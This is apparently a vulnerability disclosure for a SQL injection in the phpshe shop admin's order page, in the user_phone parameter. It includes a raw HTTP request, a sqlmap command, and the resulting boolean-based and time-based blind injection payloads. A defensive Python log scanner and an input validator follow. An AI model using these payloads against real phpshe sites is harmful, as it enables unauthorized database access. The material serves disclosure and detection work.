1. admin index.php
2. vulnerability point
3. code
4. packet capture
5. SQL injection test

PoC (raw HTTP request):
GET /phpshe/admin.php?mod=order&state=&id=1&user_tname=1&user_phone=1&date1=2018-12-26&date2= HTTP/1.1
Host: 192.3.221.177
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.3.221.177/phpshe/admin.php?mod=order
Cookie: deviceid=1545098043964; PHPSESSID=d7860vsq3q03c2pvmvc798tt64
Connection: close
sqlmap command (1.txt is the request above saved to a file):
python sqlmap.py -r 1.txt --level=3 --risk=2 --dbms=mysql --batch -p "user_phone"
injection type (sqlmap output):
---
Parameter: user_phone (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: mod=order&state=&id=1&user_tname=1&user_phone=1' RLIKE (SELECT (CASE WHEN (4784=4784) THEN 1 ELSE 0x28 END))-- EfBd&date1=2018-12-26&date2=

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: mod=order&state=&id=1&user_tname=1&user_phone=1' AND (SELECT * FROM (SELECT(SLEEP(5)))hxbT)-- YEPD&date1=2018-12-26&date2=
---
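As an added example (not part of this report and not phpshe's code), a small Python scanner that pulls the query string out of access-log lines and flags parameter values carrying the shapes seen in the sqlmap probes above (closing quote followed by RLIKE/AND/OR, SLEEP(), CASE WHEN, a trailing "-- " comment), alongside the digits-only allow-list check a fix would apply to user_phone before it reaches the query. The log lines, client IP, timestamp and the 1-20 digit phone format are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, quote
# Request line inside a Common/Combined Log Format entry.
REQ_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Shapes seen in the sqlmap probes: a closing quote followed by RLIKE/AND/OR,
# a SLEEP() call, CASE WHEN, a trailing "-- " comment, or a bare SELECT.
SQLI_RE = re.compile(r"(?i)'\s*(?:rlike|and|or)\b|\bsleep\s*\(|\bcase\s+when\b|--\s|\bselect\b")

def is_valid_phone(value: str) -> bool:
    """Digits-only allow-list a fix would apply; 1-20 digits is an assumption, not phpshe's rule."""
    return re.fullmatch(r"[0-9]{1,20}", value) is not None

def suspicious_params(target: str) -> list:
    """Return (param, value, reason) for each query value that looks injected."""
    hits = []
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name, values in params.items():
        for value in values:
            m = SQLI_RE.search(value)
            if m:
                hits.append((name, value, m.group(0)))
            elif name == "user_phone" and value and not is_valid_phone(value):
                hits.append((name, value, "not a digit string"))
    return hits

def scan_log(lines) -> list:
    """One finding per suspicious query parameter across the given log lines."""
    findings = []
    for line in lines:
        m = REQ_RE.search(line)
        if not m:
            continue
        for name, value, reason in suspicious_params(m.group("target")):
            findings.append({"target": m.group("target"), "param": name, "reason": reason})
    return findings

def _entry(query: str) -> str:
    """Constructed log line; the client IP and timestamp are made up."""
    return ('198.51.100.7 - - [26/Dec/2018:10:00:01 +0800] "GET /phpshe/admin.php?'
            + query + ' HTTP/1.1" 200 1024')

# Constructed sample log: the report's baseline request, then its two sqlmap
# payloads URL-encoded the way a client would send them.
BASE = "mod=order&state=&id=1&user_tname=1&user_phone={}&date1=2018-12-26&date2="
SAMPLE_LOG = [
    _entry(BASE.format("1")),
    _entry(BASE.format(quote("1' RLIKE (SELECT (CASE WHEN (4784=4784) THEN 1 ELSE 0x28 END))-- EfBd"))),
    _entry(BASE.format(quote("1' AND (SELECT * FROM (SELECT(SLEEP(5)))hxbT)-- YEPD"))),
]
```

Running scan_log over SAMPLE_LOG leaves the baseline request unflagged and reports the two probe requests on user_phone only.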